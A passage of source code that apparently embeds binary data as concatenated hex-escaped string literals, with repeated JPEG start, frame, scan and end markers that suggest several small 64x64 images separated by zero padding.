+"\x61\x5b\x10\xea\x5a\xcb\x61\xf4\x51\x54\xf5\x25\xbc\x95\x12\x0b"
+"\x33\xe5\xf9\xa7\x12\x4f\x91\x98\xd7\xbe\x07\xa9\xe8\x3d\x3a\xd7"
+"\xa0\x95\xd9\xca\xdd\x90\xba\x85\xac\x97\xa8\x90\x79\xbb\x2d\xd8"
+"\xfe\xf8\x0f\xbc\xeb\xfd\xd0\x7b\x03\xdf\xda\xb2\x7c\x50\xc6\x68"
+"\xad\x34\x2b\x5c\x23\x5e\xb8\x56\x0a\x31\xb2\x25\xe5\x8f\xe9\x5b"
+"\xb0\x42\x96\xf0\x24\x31\x82\x12\x35\x0a\x32\x73\xc0\xf7\x35\x81"
+"\xa0\x0f\xed\x5d\x72\xfb\x5b\x7e\x62\x53\xf6\x6b\x5f\xf7\x47\x52"
+"\x3e\xa7\xfa\xd6\xb4\xdd\xbd\xee\x8b\xf3\x31\xa8\xaf\xee\xf5\x7f"
+"\x97\x50\xf1\x45\xb1\xb1\xb5\xb2\xd5\x6c\xd0\xef\xd3\x18\x7c\xa3"
+"\xbc\x47\x82\x3f\xcf\xbd\x6c\x43\x05\xac\xd7\x11\xea\x50\x7d\xe9"
+"\x23\x03\x72\x9c\x09\x14\xf2\x32\x3b\xfb\x54\xf3\xc3\x1d\xc4\x0f"
+"\x0c\xaa\x1a\x39\x14\xab\x03\xdc\x1a\xc4\xf0\x9c\xaf\x0c\x37\x3a"
+"\x44\xed\x99\x74\xf9\x36\x02\x7f\x8a\x33\xca\x9a\x2e\xe5\x0f\x35"
+"\xf9\x3f\xf8\x3f\x98\xec\xa3\x3f\x27\xf9\xaf\xf8\x1f\x91\xb1\x6f"
+"\x75\x0d\xc3\xca\x91\x3e\x5e\x17\xd8\xea\x46\x0a\x9f\xa7\xa1\xec"
+"\x7b\xd4\xf5\x5a\x6b\x28\x65\xbc\x8a\xef\xe6\x49\xe2\xe3\x7a\x1c"
+"\x6e\x5f\xee\xb7\xa8\xef\x4f\x4b\x98\x5e\xe6\x4b\x75\x90\x19\xa2"
+"\x00\xb2\x77\x00\xf4\x3f\x4a\xc9\xa5\xd0\xd1\x37\xd4\x83\x52\xb9"
+"\x9a\x24\x8e\x0b\x38\xf7\xdc\xce\x4a\xa1\x23\xe5\x4f\x56\x6f\x61"
+"\xe9\xdf\xa5\x5a\x85\x1a\x38\x51\x1e\x46\x95\x95\x40\x2e\xc0\x02"
+"\xc7\xd7\x8a\x22\xf3\x3c\xa4\xf3\xb6\xf9\x98\x1b\xb6\xf4\xcf\x7c"
+"\x7b\x53\xe8\x6f\x4b\x0d\x2d\x6e\x63\x78\xaa\xf9\xed\x34\x76\x8a"
+"\xdf\x9b\xab\xb6\x10\x42\x07\x5c\xb7\x19\xfc\xbf\xa5\x5e\xd2\xec"
+"\x53\x4d\xd3\x2d\xec\xe3\xe9\x12\x05\x27\xd4\xf7\x3f\x89\xcd\x63"
+"\xc7\xff\x00\x13\x7f\x18\xbc\xbd\x6d\xb4\xa5\xd8\xbe\x86\x56\xeb"
+"\xf9\x0f\xe5\x5d\x1d\x69\x3f\x76\x2a\x3f\x33\x28\x7b\xd2\x73\xf9"
+"\x05\x73\xba\xd7\xfc\x4a\xbc\x45\x63\xab\x29\xc4\x33\xff\x00\xa2"
+"\xdc\x7a\x60\xfd\xd3\xfe\x7d\x2b\xa2\xaa\x5a\xcd\x82\x6a\x9a\x4d"
+"\xc5\x9b\xe3\x32\x27\xca\x4f\x66\xea\x0f\xe7\x8a\x54\xe4\x94\xb5"
+"\xd8\xaa\x91\x72\x8e\x9b\x97\x6a\xa5\xed\x84\x77\x6d\x1c\xa1\xda"
+"\x1b\x88\x8e\x63\x99\x3a\xaf\xa8\xf7\x07\xb8\x35\x53\xc3\x1a\x83"
+"\x6a\x1a\x2c\x4d\x36\x45\xc4\x24\xc3\x30\x3d\x43\xaf\x1c\xfe\x87"
+"\xf1\xad\x6a\x96\x9c\x25\x61\xa6\xa7\x1b\x80\xff\xd9\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08"
+"\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda"
+"\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\x99\xe2\x41"
+"\x74\x65\x04\xef\x64\x0a\x46\xee\x30\x09\xc7\x1f\x89\xa6\xd2\xcc"
+"\xb0\x0b\xc6\x75\xd9\xe7\x94\x01\xf0\x7e\x6d\xb9\x38\xc8\xf4\xce"
+"\x69\x29\x3d\xc7\x1d\x82\x8a\x8e\xe1\x25\x92\x30\xb0\xcd\xe4\xb6"
+"\xe5\x25\xb6\x06\xc8\x07\x91\x83\xea\x38\xcf\x6a\x81\x92\x68\xe5"
+"\x57\x97\x50\x45\x8f\xce\x67\x28\xc8\xab\xb9\x08\xe1\x33\x9e\xc7"
+"\x9c\xf5\x34\x8a\x2d\xd1\x4d\xf3\x23\xf9\x7f\x78\x9f\x37\xdd\xf9"
+"\x87\xcd\xf4\xf5\xa1\xa4\x8d\x5b\x6b\x48\x8a\xd9\xc6\x0b\x00\x69"
+"\x5d\x05\x98\xea\x29\x0b\xa0\x60\xa5\xd4\x31\xe8\xa5\x86\x4f\xe1"
+"\x4a\x48\x50\x4b\x10\xa0\x75\x24\xe0\x53\xb8\x58\x86\x74\x63\xa8"
+"\x6d\x4b\xa4\xf3\x15\x14\xc8\xbe\x58\xdc\x57\x27\x19\x3e\xe4\x1a"
+"\x16\x39\xc3\xb9\x6b\x8c\xa9\x07\x68\xd8\x3e\x5f\x4f\xad\x5b\xbc"
+"\x0e\x3c\xb6\x8e\x16\x94\x96\x0a\xdb\x70\x0a\x83\xdf\x9e\xa0\x54"
+"\x54\x9c\x15\xef\xfa\x82\x9b\xdb\xf4\x20\x11\x5c\x79\x45\x4d\xcf"
+"\xcf\x9c\x86\xf2\xc7\x03\xd3\x15\x57\x53\xb7\x96\x6b\x58\xa2\x30"
+"\x7d\xa4\xef\xf9\xdc\x05\x04\x2f\x7c\x67\xa1\x3d\x2b\x46\x8a\x87"
+"\x4d\x35\x63\x48\xd4\x71\x97\x31\x8f\x73\x67\x23\xc9\x39\x36\x0b"
+"\x37\x9e\x8a\xb1\x16\x61\xfb\x8e\x31\x8f\x6c\x75\xe2\x92\xe3\x4d"
+"\x92\x44\xbc\x32\x44\xb3\x4a\x61\x8d\x23\x73\x8c\x96\x03\xe6\x23"
+"\xd2\xb6\x68\xa9\x74\x22\xcd\x16\x26\x6b\x6f\xeb\x6f\xf2\x31\x2e"
+"\x74\xf9\xe4\xbb\x9c\x3a\x4b\x22\xcc\xc0\xab\xa1\x41\xb4\x7b\x92"
+"\x32\x31\xed\x56\xf5\x90\xa2\xd6\x16\x90\xab\xa2\x4a\xa5\x91\xce"
+"\x04\x98\xec\x4f\x4f\x7e\x78\xa4\xd4\x35\x1b\x88\x2f\x12\xd2\xca"
+"\xc8\x5c\xcc\x63\xf3\x5b\x74\x81\x15\x57\x38\xeb\xeb\x9a\x80\xdf"
+"\x6b\x2c\xa4\x36\x89\x03\x03\xd4\x1b\x90\x47\xf2\xab\x58\x6d\x1d"
+"\x9e\xfd\xda\x33\x78\xbf\x79\x5d\x6d\xd9\x33\xa6\xaa\xef\x6a\x0d"
+"\xc3\x4c\x24\x93\x2c\xa1\x76\x13\xf2\xf1\xdf\x1d\x8d\x58\xa2\xb5"
+"\x30\x33\xa1\x95\x66\x8f\x7a\x86\x03\x24\x61\x94\xa9\x04\x1c\x1e"
+"\x0d\x3e\xac\x5d\x44\xf2\xc2\x56\x19\x04\x72\x71\x87\x2b\xbb\x1c"
+"\xfa\x55\x79\x0a\xa4\xc2\x22\xca\x1c\x82\xc1\x73\xc9\x1e\xb8\xa4"
+"\xd0\xd3\xee\x14\x51\x45\x22\x8c\xd6\xc7\xfc\x24\xa7\xd7\xec\x6b"
+"\xff\x00\xa1\xb5\x6a\x8d\x9e\x57\x6c\xe2\xb0\xf5\xb8\x1f\xed\x2b"
+"\x75\x67\xa9\xc3\x67\x76\xb1\x6c\x2b\x2e\x08\x75\xce\x7b\xf4\xe7"
+"\x35\xcf\x7f\x69\xf8\x87\xcf\xd9\xf6\xd8\x3c\xac\xe3\xcc\xc4\x7f"
+"\x9e\x3a\xd7\x44\x68\xba\x8a\xe9\xa3\x96\x55\x95\x27\x66\x9f\xc8"
+"\xf4\x43\x3c\x42\xe0\x5b\x99\x17\xcd\x2b\xbc\x26\x79\x23\xa6\x6a"
+"\x4a\xab\x7f\x63\x1d\xec\x6a\x19\x9a\x39\x63\x3b\xa2\x99\x38\x68"
+"\xdb\xd4\x7f\x87\x43\x53\x2b\x88\xc4\x71\xcd\x2a\x19\x58\x63\xd3"
+"\x79\x03\x9c\x0a\xcb\x4b\x68\x6d\x77\x7d\x49\x29\x8d\x1a\x3b\x06"
+"\x64\x52\xcb\x9c\x12\x39\x19\xeb\x8a\x7d\x14\x86\x51\x09\x38\x32"
+"\x79\xa8\xa1\x43\x61\x0a\xb6\x72\xbd\x89\xf4\x34\x55\xb9\x63\x49"
+"\xa2\x78\xa5\x5d\xc8\xe0\xab\x0f\x51\x55\x66\x4f\x20\xc2\x91\x45"
+"\x23\xa3\x1d\x99\x1c\xec\xc0\xe0\x9c\x9c\xe3\x8e\xbc\xd1\x60\x4e"
+"\xdb\x94\x6e\x34\xab\x6b\x8b\xa6\xb9\x76\x9d\x65\x65\x0a\x4a\x4a"
+"\x57\x81\xd0\x71\xf5\x34\xcf\xec\x6b\x6f\xf9\xed\x77\xff\x00\x81"
+"\x0d\x5a\x14\x51\xcf\x2e\xe1\xec\xe3\xd8\xff\xd9\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00"
+"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00"
+"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\x7a\x29\xa2\x48"
+"\xca\x96\x12\x21\x00\x64\x90\xc3\x00\x50\x24\x42\xa1\x83\xa1\x52"
+"\x70\x18\x30\xc1\x3f\x5a\x8b\xa2\xec\xc7\x51\x49\xbd\x37\x6d\xde"
+"\xbb\xba\x63\x3c\xd3\x64\x95\x23\x89\xe4\x66\x1b\x50\x12\xd8\x3e"
+"\x94\x5d\x0e\xcc\x7d\x15\x0d\xad\xd2\x5c\x41\x1c\xa3\x08\x64\x19"
+"\x08\xcc\x33\xfa\x1a\x9a\x84\xd3\x57\x40\xd3\x8b\xb3\x0a\xce\xb8"
+"\x76\x6b\x99\x03\x46\x50\x29\xc0\x24\xfd\xe1\x81\xcf\xf9\xf4\xad"
+"\x1a\xce\xb8\x32\x1b\x99\x3c\xc4\x0a\x01\xc2\xe0\xe7\x2b\x81\xcf"
+"\xb7\x7a\xa4\x43\x28\x5b\xc3\xf6\xb4\xbc\x7b\x6b\x78\xd6\x3f\x3e"
+"\x36\x30\x82\x0a\xba\x80\x72\xb9\x1c\x77\xcf\xa5\x58\x36\x73\x18"
+"\xe6\x96\x2b\x51\x0a\x99\x63\x91\x2d\xc3\x0e\x76\xf5\x3e\x80\x9a"
+"\x9b\x4f\xd4\x64\x92\x59\xed\xae\xec\xd6\xce\x48\x63\x12\xed\x47"
+"\x0e\xbb\x4e\x7d\x07\x5e\x0d\x58\xfe\xd2\xb5\xfd\xd6\x64\x23\xcd"
+"\x01\x97\x23\x1c\x1e\x06\x6b\x99\xd1\x8c\x34\x93\xd7\xe5\xfd\x75"
+"\x3b\x16\x26\x55\x35\x82\xd3\xe7\xd3\xfe\x1b\xd4\xa8\x6d\x6e\x64"
+"\x82\xe2\xe5\x63\xf2\xae\x4c\xfe\x74\x2a\x48\x24\x60\x63\x07\xb7"
+"\x23\x35\x3a\x5b\x34\x3a\x7f\xd9\x04\x5e\x69\x92\x27\x2e\xe4\x8c"
+"\x6f\x23\xb8\xf7\x35\x22\x6a\x16\xcf\xb7\x0e\x46\xec\x6d\xca\x91"
+"\x90\x73\xc8\xf6\xe0\xf3\xed\x44\x5a\x8d\xac\xcc\xab\x14\x9b\x8b"
+"\x1c\x01\x8f\x62\x7f\xa1\xa1\x46\x1d\x18\xa5\x2a\x8d\x6b\x1d\x8a"
+"\xfa\x6d\x93\x43\x70\x24\x96\x15\x52\xb6\xf1\xa2\x9e\x38\x60\x3e"
+"\x6a\xd2\xaa\x89\xa9\x5b\x39\x40\xac\xc7\x79\x0a\x3e\x43\xc9\x23"
+"\x3f\xca\xad\xd6\x94\xd4\x52\xb4\x4c\xea\xb9\xca\x57\x9a\x0a\xce"
+"\x9f\xcd\xfb\x4c\x9e\x6e\xcc\x6e\xf9\x36\xff\x00\x77\x03\xaf\xbe"
+"\x73\x5a\x35\x9d\x3a\xb8\xb9\x90\xbb\x86\x05\xb2\xa3\x18\xda\x30"
+"\x38\xf7\xef\xcf\xbd\x6a\x8c\x19\x15\xbf\xcd\xe2\x7b\xd5\xe4\x0f"
+"\xb2\x20\xc8\xe3\xf8\x9a\xa6\x8a\x2d\x35\x58\xf9\x6e\x00\x87\x1b"
+"\x98\x3f\x07\x24\x90\x09\xef\xce\x6a\xa6\x8f\x6e\x24\x69\xa4\xbb"
+"\xd4\xe1\xbb\xbb\xb8\x84\x46\xcb\x0e\x17\x62\x73\xd8\x7d\x7a\xd5"
+"\xa7\xd2\xbc\xc0\x4c\x93\x65\xf2\xb8\x21\x30\x00\x0a\x46\x30\x3e"
+"\xb5\x38\x84\xf9\x92\x4a\xf6\x34\xc3\x35\xca\xf9\x9d\xae\x4e\xd0"
+"\xd9\xc0\x21\x77\x28\xa2\x24\x29\x19\x76\xe8\xa4\x73\xf5\xe2\x98"
+"\x2d\x6c\x55\x0c\x02\x42\xa5\x30\xdc\x4b\x86\x40\x06\x07\x3d\x40"
+"\xc1\xa7\xc9\x63\x1b\xc5\x0c\x64\x8d\xb1\x23\x20\x18\xcf\x55\xc5"
+"\x40\xfa\x4a\xba\x3a\x19\x8e\xc6\x04\xfd\xd1\x9d\xc5\x76\x93\x9f"
+"\x4f\x6a\xc5\xc5\xf4\x89\xbc\x65\x1e\xb3\x63\xc4\x3a\x71\x40\x8b"
+"\x2a\x6d\x04\x49\xb5\x65\xe3\xe5\xc0\xcf\xd0\x60\x55\x89\xee\xe2"
+"\x82\x31\x2b\x96\x65\x6c\x9c\xa2\xee\xe3\x19\x27\xe9\x8a\x82\x5d"
+"\x36\x37\x2c\x41\x03\x73\x3b\x11\xb4\x63\xe6\x00\x63\xf4\xa7\x4b"
+"\x66\xf2\x59\x45\x6c\x2e\x18\x04\xc0\x62\x57\x3e\x60\x1d\x8f\xb5"
+"\x35\xcc\xaf\x64\x27\xc8\xda\xbc\x8b\x60\x82\x01\x1d\x08\xc8\xac"
+"\xeb\x84\x65\xb9\x90\xb4\x8c\xfb\x8e\xe1\x9f\xe1\x18\x1c\x0f\x6f"
+"\xf1\xad\x11\xd3\x9a\xce\x9e\x30\x97\x32\x90\xcc\x77\xb6\xe3\xb8"
+"\xe7\x1c\x01\x81\xe8\x38\xad\xd1\xcb\x22\x6b\x4d\x36\xda\xd2\x77"
+"\x9e\x2f\x31\xa5\x75\x08\x5e\x47\x2e\x42\xe7\x38\x19\xf7\xab\x74"
+"\x51\x43\x6d\xea\xc6\x92\x5a\x20\xa2\x8a\x29\x0c\x28\xa2\x8a\x00"
+"\x2b\x36\x68\xe3\x4b\x99\x8c\x78\xcb\xb6\xe7\xc1\xcf\xcd\x81\xfe"
+"\x02\xb4\xab\x36\x6f\x27\xed\x33\x79\x3b\x73\xbf\xf7\x9b\x7f\xbd"
+"\x81\xd7\xdf\x18\xaa\x44\xc8\xff\xd9\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40"
+"\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01"
+"\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\xa2\x0c\xa5\x9f\xce\x54"
+"\x56\xde\xd8\xda\x73\xf2\xe7\x8f\xc7\x15\x7a\xa8\x81\x28\x67\xf3"
+"\x99\x59\xb7\xb1\x05\x46\x3e\x5c\xf0\x3e\xb8\xa1\xec\x0b\x70\xa2"
+"\x8a\x2a\x4b\x0a\x28\xa2\x80\x0a\x28\xa5\x51\x96\x00\x77\xa0\x0b"
+"\xb5\x47\x63\xa3\x38\x92\x4f\x30\x97\x62\x0e\x31\x80\x4f\x03\xf0"
+"\x1c\x55\xea\xa2\x23\x31\x33\xa9\x76\x7c\xbb\x36\x58\xf2\x32\x73"
+"\x8f\xa0\xe9\x54\xf6\x21\x6e\x14\x51\x45\x49\x61\x45\x14\x50\x01"
+"\x4e\xb5\x48\x2e\x96\x2b\xa5\xf9\xf6\x96\xf2\xdb\x91\x8e\xa0\xf1"
+"\xf9\xd3\x54\x48\x6e\x23\x55\x8b\x74\x67\x3b\xdf\x76\x36\xf1\xc7"
+"\x1d\xf3\x57\xaa\x91\x0f\x50\xaa\x02\x24\x85\xa4\x58\xc9\x21\x9d"
+"\x9c\xe5\xb3\xc9\x39\x35\x7e\xa8\x2a\xc2\xad\x20\x83\x6e\xd3\x23"
+"\x13\xb4\xe7\xe6\xcf\xcd\xfa\xe6\x87\xb0\x2d\xc5\xa2\x8a\x2a\x4b"
+"\x0a\x55\x05\x98\x01\xde\x92\x9d\x6d\x1d\xbd\xc3\xad\xca\x91\x23"
+"\xc4\x59\x01\x04\xfc\xa7\xa3\x0c\x7a\xf1\x4d\x21\x37\x62\x7b\x68"
+"\xe4\x8a\xdd\x52\x59\x7c\xd7\x1d\x5f\x68\x5c\xfe\x02\xa5\xa2\x8a"
+"\x64\x85\x67\xa3\x42\xc6\x43\x6f\xb7\x6f\x98\xc0\xed\x18\xf9\xb3"
+"\xf3\x7e\x39\xcd\x68\x55\x01\x2a\x4c\xd2\x34\x60\x80\xae\xc8\x72"
+"\xb8\xe4\x1c\x1f\xff\x00\x5d\x0f\x60\x5b\x8b\x45\x14\x54\x96\x15"
+"\x3d\x9c\xb1\xcb\x06\x62\x04\x05\x66\x53\x95\xc7\x20\xe0\xfe\xb5"
+"\x05\x58\xb4\x97\xcd\x87\x3e\x5b\xa6\x18\xae\x18\x63\x38\x38\xcf"
+"\xd0\xd3\x44\xb2\x6a\x28\xa6\xb3\x2a\x90\x19\x80\x2c\x70\x32\x7a"
+"\x9a\x62\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00"
+"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03"
+"\x11\x00\x3f\x00\xf4\x70\x24\x32\xc6\x12\x2d\xe8\x5b\x0e\xdb\xb1"
+"\xb4\x63\xaf\xbf\xa5\x5e\xa8\x6d\x62\x92\x18\x02\x4b\x2f\x9a\xf9"
+"\x24\xb6\xdd\xbd\xf8\x18\xf6\x1c\x54\xd4\x06\xe1\x4d\x93\x7f\x96"
+"\xde\x56\xdd\xf8\x3b\x77\x74\xcf\x6c\xd3\xaa\x85\xab\xcf\x73\xa9"
+"\x4f\x33\x17\x8e\xda\x1c\xc3\x1a\x1e\x37\xb7\xf1\x31\xf6\xec\x3f"
+"\x1f\x5a\x69\x09\xbe\x84\xba\x6d\x98\xb1\xb2\x48\x4b\x99\x24\xc9"
+"\x69\x24\x3d\x5d\xcf\x2c\x7f\x3a\xb5\x45\x14\x37\x77\x76\x09\x59"
+"\x59\x05\x53\xd6\x7f\xe4\x09\x7d\xff\x00\x5e\xf2\x7f\xe8\x26\xae"
+"\x55\x3d\x67\xfe\x40\x97\xdf\xf5\xef\x27\xfe\x82\x69\xc7\xe2\x42"
+"\x97\xc2\xcb\x94\x51\x48\xcc\xa8\xa5\x98\x85\x50\x32\x49\x38\x00"
+"\x54\x94\x56\xbb\xbc\xfb\x3c\xf6\xd0\x24\x7e\x64\xb7\x0f\x80\xb9"
+"\xc6\x14\x72\xcc\x7d\x80\xfd\x48\x1d\xea\xd5\x57\x8a\x1b\x79\x2e"
+"\x05\xf4\x78\x77\x92\x30\xaa\xe0\xe4\x6d\xeb\xc7\xd7\x3f\xca\xac"
+"\x53\x76\x12\xb8\x51\x45\x14\x86\x15\x4f\x59\xff\x00\x90\x25\xf7"
+"\xfd\x7b\xc9\xff\x00\xa0\x9a\xb9\x54\xf5\x9f\xf9\x02\x5f\x7f\xd7"
+"\xbc\x9f\xfa\x09\xaa\x8f\xc4\x89\x97\xc2\xcb\x95\x4f\x53\xb5\x92"
+"\xfa\x04\xb6\x0c\x16\x17\x71\xe7\xfa\xb2\x77\x51\xf5\xe0\x1f\x6c"
+"\xd4\xf7\x57\x11\xda\xda\xc9\x71\x2e\x76\x46\xa5\x8e\x06\x49\xf6"
+"\x1e\xf5\x16\x9a\x2e\x7e\xc6\xaf\x7a\xdf\xbf\x90\x97\x65\xec\x99"
+"\xe8\xa3\xe8\x38\xa1\x5d\x7b\xc0\xec\xfd\xd2\xc8\x00\x00\x00\xc0"
+"\x1d\xa9\x68\xa2\xa4\xa0\xa2\x8a\x28\x00\xaa\x7a\xcf\xfc\x81\x2f"
+"\xbf\xeb\xde\x4f\xfd\x04\xd5\xca\xa7\xac\xff\x00\xc8\x12\xfb\xfe"
+"\xbd\xe4\xff\x00\xd0\x4d\x54\x7e\x24\x4c\xbe\x16\x3e\x1b\xc5\x9e"
+"\xfa\x7b\x68\xd0\x91\x00\x50\xf2\x76\xdc\x79\xdb\xf5\x03\x07\xf1"
+"\x15\x66\xa0\xb3\xb5\x8e\xce\x0f\x2a\x2d\xc4\x16\x2e\xcc\xc7\x25"
+"\x89\x39\x24\x9a\x9e\x93\xb5\xf4\x1a\xbd\xb5\x0a\x28\xa2\x90\xc2"
+"\x8a\x40\x41\x19\x07\x20\xd2\xd0\x01\x55\x75\x48\xde\x6d\x2a\xee"
+"\x28\x97\x73\xbc\x2e\xaa\x3d\x49\x53\x8a\xb5\x45\x34\xec\xee\x26"
+"\xae\xac\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00"
+"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03"
+"\x11\x00\x3f\x00\xf4\x2f\x0d\x7f\xc8\xb7\xa7\xff\x00\xd7\x05\xfe"
+"\x55\xa7\x59\x9e\x1a\xff\x00\x91\x6f\x4f\xff\x00\xae\x0b\xfc\xab"
+"\x4e\xae\xa7\xc4\xc8\xa7\xf0\x20\xa8\x2f\x2d\xa3\xbc\xb4\x92\xde"
+"\x5c\xec\x90\x63\x23\xa8\xf4\x23\xdc\x1e\x6a\x7a\x2a\x13\xb1\x6d"
+"\x5f\x41\x90\xab\xa4\x28\x92\x3f\x98\xea\xa0\x33\xe3\x1b\x8f\xae"
+"\x29\xf5\x42\xf2\x39\xa1\xd4\x20\xbc\x81\x5e\x40\x71\x0c\xd1\x83"
+"\xfc\x24\xf0\xc0\x7a\x83\xfa\x13\xe9\x57\xe9\xb5\xd4\x49\xf4\x19"
+"\x2c\x69\x34\x6d\x1c\xa8\xae\x8c\x30\xca\xc3\x20\x8a\xa3\x75\x1a"
+"\xcc\xf2\x5a\x95\x9d\x57\x00\xee\x5f\x94\x30\xfe\xe8\x6f\xc3\x9e"
+"\xbf\x08\x51\xb0\x08\x04\xe0\xe4\x8e\x4e\x2b\x4a\x99\x34\x31\xce"
+"\x9b\x25\x40\xeb\x9c\xe0\xd2\x8c\x14\x5d\xca\x9c\xdc\xa3\x63\x1a"
+"\x3d\x54\x6a\x93\xc1\x0c\x56\xb2\xc5\xe5\xca\xac\xcd\x26\x00\xc0"
+"\xfc\x79\xad\xf8\xa3\xf3\x1f\xe6\x1f\x28\xea\x08\xeb\x55\x63\xb1"
+"\xb5\x13\x2f\x97\x04\x62\x4e\xa3\xfc\x6b\x4d\x14\x22\x05\x5e\x82"
+"\xb6\x93\x4f\xe1\x47\x3c\x54\x97\xc4\xc6\xcf\x27\x95\x19\x60\xa5"
+"\x8f\x40\xa3\xb9\xa8\xae\x23\x58\xec\x2e\x02\x8c\x65\x18\x9f\xae"
+"\x2a\x44\xdc\xf3\x17\x0e\x0c\x40\x6d\x00\x7a\xe7\x9c\xd2\x5e\xff"
+"\x00\xc7\x8c\xff\x00\xf5\xcd\xbf\x95\x0b\x70\x7b\x0d\xba\xfe\x0f"
+"\xbd\xdf\xa7\x4a\x86\xa6\xba\xfe\x0e\x3d\x79\xcd\x43\x50\xcd\x10"
+"\x51\x45\x49\x02\x6f\x7d\xc7\xee\xaf\x62\x3b\xd2\x06\xc9\x2d\xd0"
+"\xaa\x6e\x60\xc0\xb7\x25\x4e\x38\xf6\xe2\x96\x69\x02\x94\x4c\x31"
+"\x32\x1c\x0c\x76\xf7\xa9\x09\x00\x64\xf0\x2a\x38\x84\x85\x9d\x9d"
+"\x81\x52\x7e\x40\x3b\x0a\xb2\x18\xe8\xa3\x58\xa2\x58\xe3\x18\x55"
+"\x18\x02\x99\x7b\xff\x00\x1e\x33\xff\x00\xd7\x36\xfe\x55\x35\x43"
+"\x7b\xff\x00\x1e\x33\xff\x00\xd7\x36\xfe\x54\x2d\xc1\xec\x36\xeb"
+"\x19\x4e\x07\x7f\xad\x43\x53\x5d\x11\xb9\x06\x46\x79\xe3\xbd\x43"
+"\x52\xca\x42\xa8\x2c\xe1\x46\x32\x7d\x4f\x6a\xb6\xaa\x15\x42\x8e"
+"\x82\xab\x41\xfe\xbc\x0c\x8e\x87\x8c\x55\xa2\x40\xeb\x4d\x03\x21"
+"\x98\xa4\xaf\xf6\x66\x0c\x77\x2e\x5b\x1d\x85\x4c\x00\x03\x03\x80"
+"\x2a\x38\x04\x9e\x58\x33\x63\x79\xe4\x81\xdb\xda\xa5\xa6\xc9\x5d"
+"\xc2\xa1\xbd\xff\x00\x8f\x19\xff\x00\xeb\x9b\x7f\x2a\x96\x9b\x2a"
+"\x09\x62\x78\xd8\x90\x1d\x4a\x9c\x7b\xd0\x81\xec\x00\xff\xd9\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00"
+"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
+"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xd7\x86"
+"\xf5\xe4\x99\x51\xe1\xd8\x09\x2b\x9c\xe7\x91\xf8\x74\xad\x9d\x18"
+"\xe3\x53\xce\x40\x3e\x53\x73\x8e\x7b\x53\x22\xd3\xee\x64\x82\x29"
+"\xbf\x74\x04\xaa\x0a\xe5\xfa\xe7\xb7\x4a\xd0\xd3\x74\xc9\xed\xae"
+"\x1e\x79\x98\x0c\x21\x50\xa8\x73\x9f\x7a\xf1\x70\xd8\x5a\xb0\xac"
+"\xa4\xe3\x64\x8f\x42\xb5\x78\x4a\x9b\x49\xdc\xb4\x39\x03\xbd\x15"
+"\xfc\xd6\x8d\x47\x70\xae\xf6\xee\x22\xdb\xe6\x6d\x3b\x37\xf4\xcf"
+"\x6c\xd2\x02\x87\x86\xbf\xe4\x5b\xd3\xff\x00\xeb\x82\xff\x00\x2a"
+"\xd3\xac\xcf\x0d\x7f\xc8\xb7\xa7\xff\x00\xd7\x05\xfe\x55\xa7\x57"
+"\x53\xe2\x64\xd3\xf8\x10\x51\x45\x15\x05\x85\x53\xb5\xbb\x69\x2f"
+"\x6e\x6d\x27\x55\x49\x62\x21\x93\x1d\x1e\x33\xd1\xbf\x3c\x83\xf4"
+"\xf7\xab\x95\x0c\xb1\xc2\xb2\x0b\xa7\x41\xbe\x24\x60\x1f\x19\x21"
+"\x4e\x09\x1f\xa0\xa6\xac\x27\x72\x6a\x29\x90\xcb\x1c\xf0\xa4\xd0"
+"\xb0\x78\xdd\x43\x2b\x0e\x84\x1a\x7d\x21\x99\x9e\x1a\xff\x00\x91"
+"\x6f\x4f\xff\x00\xae\x0b\xfc\xab\x4e\xb3\x3c\x35\xff\x00\x22\xde"
+"\x9f\xff\x00\x5c\x17\xf9\x56\x9d\x5d\x4f\x89\x91\x4f\xe0\x41\x45"
+"\x14\x54\x16\x14\x51\x45\x00\x54\xd3\xec\xcd\x90\x9a\x25\x70\x60"
+"\x69\x0b\xc4\x98\xfb\x80\xf2\x57\xe9\x9c\x91\xf5\xab\x75\x5b\x50"
+"\x86\x69\xad\x18\x5a\xca\x63\x9d\x48\x78\xce\x70\x09\x1c\xe0\xfb"
+"\x1e\x87\xeb\x4e\xb3\xb8\xfb\x55\xa4\x53\xf9\x6f\x19\x75\xc9\x47"
